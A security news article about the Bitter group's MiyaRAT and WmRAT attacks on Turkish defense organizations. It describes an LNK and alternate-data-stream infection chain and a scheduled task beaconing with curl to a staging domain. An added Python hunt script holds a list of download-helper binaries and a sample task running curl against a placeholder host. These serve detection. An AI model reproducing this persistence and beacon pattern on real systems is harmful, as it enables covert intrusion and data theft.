A cyberespionage threat group often called 'Bitter' was observed targeting defense organizations in Turkey using a novel malware family named MiyaRAT.
MiyaRAT is used alongside the WmRAT malware, cyberespionage malware previously associated with Bitter.
Proofpoint discovered the campaign and reports that the new malware is likely reserved for high-value targets, deployed only sporadically.
Bitter is a suspected South Asian cyberespionage threat group active since 2013, targeting government and critical organizations in Asia.
In 2022, they were observed by Cisco Talos in attacks against the Bangladeshi government, using a remote code execution flaw in Microsoft Office to drop trojans.
Last year, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing attacks targeting various Chinese nuclear energy companies and academics.
Abusing alternate data streams
The attacks in Turkey started with an email containing a foreign investment project lure, attaching a RAR archive.
The archive contains a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and alternate data streams (ADS) embedded in the RAR file named "Participation" and "Zone.Identifier."
If the recipient opens the LNK file, they trigger the execution of PowerShell code hidden in the ADS, which opens the legitimate decoy PDF as a distraction. At the same time, it creates a scheduled task named "DsSvcCleanup" that runs a malicious curl command every 17 minutes.
The command reaches a staging domain (jacknwoods[.]com) and awaits responses such as instructions to download additional payloads, perform network reconnaissance, or steal data.
Proofpoint reports that a command to fetch WmRAT (anvrsa.msi) in the attack they examined was served within 12 hours.
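The persistence described above (a scheduled task that runs curl against a staging domain on a short repeating interval) leaves a concrete artefact: the task definition XML that Task Scheduler stores under C:\Windows\System32\Tasks and that is also copied into the TaskContent field of Security event 4698 when a task is created. The following hunt script is an added example, not code from the Proofpoint report or from this article; it parses that XML and flags tasks that combine a download/scripting binary, a URL in the arguments, or a repetition interval of an hour or less. The sample task definitions are constructed for the example: one is modelled on the "DsSvcCleanup" task with its 17-minute interval as described above, with a placeholder domain standing in for the real staging host, and the other two are benign controls.

```python
"""Hunt Windows Task Scheduler definitions for short-interval beaconing tasks.

Added example (not from the Proofpoint report). Parses Task Scheduler XML
(the files under C:\\Windows\\System32\\Tasks, or the TaskContent of event 4698)
and flags tasks whose action looks like a curl/PowerShell beacon.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional

# Namespace used by every Task Scheduler task definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Binaries that legitimately exist on Windows but are common download/exec helpers.
SUSPICIOUS_BINARIES = {
    "curl", "curl.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
    "cmd", "cmd.exe", "mshta", "mshta.exe", "bitsadmin", "bitsadmin.exe",
    "certutil", "certutil.exe",
}
MAX_BEACON_INTERVAL_SECONDS = 3600  # repeats at least hourly -> beacon-like


@dataclass
class Finding:
    task_name: str
    command: str
    arguments: str
    interval_seconds: Optional[int]
    reasons: List[str]


def parse_iso_duration(value: str) -> Optional[int]:
    """Convert a Task Scheduler ISO 8601 duration (PT17M, P1DT2H, ...) to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task(task_name: str, task_xml: str) -> List[Finding]:
    """Return one Finding per <Exec> action that matches at least two indicators."""
    root = ET.fromstring(task_xml)
    intervals = [parse_iso_duration(e.text or "")
                 for e in root.findall(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    shortest = min(intervals) if intervals else None

    findings = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        command = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
        # Normalise the executable name regardless of path or quoting.
        binary = command.replace("\\", "/").rsplit("/", 1)[-1].strip('"').lower()

        reasons = []
        if binary in SUSPICIOUS_BINARIES:
            reasons.append(f"action runs {binary}")
        if re.search(r"https?://", arguments, re.IGNORECASE):
            reasons.append("arguments contain a URL")
        if shortest is not None and shortest <= MAX_BEACON_INTERVAL_SECONDS:
            reasons.append(f"repeats every {shortest}s")
        # Any single indicator is noisy on its own; require two to raise a finding.
        if len(reasons) >= 2:
            findings.append(Finding(task_name, command, arguments, shortest, reasons))
    return findings


def hunt(tasks: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Run analyze_task over a {task name: task XML} mapping; keep only tasks with findings."""
    results = {}
    for name, xml in tasks.items():
        found = analyze_task(name, xml)
        if found:
            results[name] = found
    return results


# Constructed sample task definitions (not real artefacts from the campaign).
SAMPLE_TASKS = {
    # Modelled on the DsSvcCleanup task described in the article; placeholder domain.
    "DsSvcCleanup": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT17M</Interval></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>curl</Command>
    <Arguments>-s https://staging.example.invalid/c</Arguments>
  </Exec></Actions>
</Task>""",
    # Benign: daily backup job, no repetition, ordinary binary.
    "NightlyBackup": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger>
    <StartBoundary>2024-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\Robocopy.exe</Command>
    <Arguments>D:\\data E:\\backup /MIR</Arguments>
  </Exec></Actions>
</Task>""",
    # Benign-looking: PowerShell every four hours, no URL -> only one indicator, not flagged.
    "InventoryCollector": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT4H</Interval></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-File C:\\Scripts\\inventory.ps1</Arguments>
  </Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for name, findings in hunt(SAMPLE_TASKS).items():
        for f in findings:
            print(f"[!] {name}: {f.command} {f.arguments} :: {', '.join(f.reasons)}")
```

The two-indicator threshold is the design choice worth tuning: a task that runs curl hourly is rare in most fleets, but PowerShell on a four-hour cadence is routine, so a single indicator only becomes a finding when paired with a URL in the arguments or a sub-hour interval. To hunt at scale, feed the script with the XML from each host's Tasks directory or from the TaskContent of 4698 events in the Security log.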
The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the target, but when it failed to establish communication with the command and control server, it downloaded MiyaRAT (gfxview.msi).
Both are C++ remote access trojans (RATs) that provide Bitter with data exfiltration, remote control, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and generally more sophisticated, featuring more advanced data and communications encryption, an interactive reverse shell, and enhanced directory and file management.
Its more selective deployment by Bitter may indicate that the threat actors reserve it for high-value targets, minimizing its exposure to analysts.
Indicators of compromise (IoCs) associated with this attack are listed at the bottom of Proofpoint's report, while a YARA rule to help detect the threat is available here.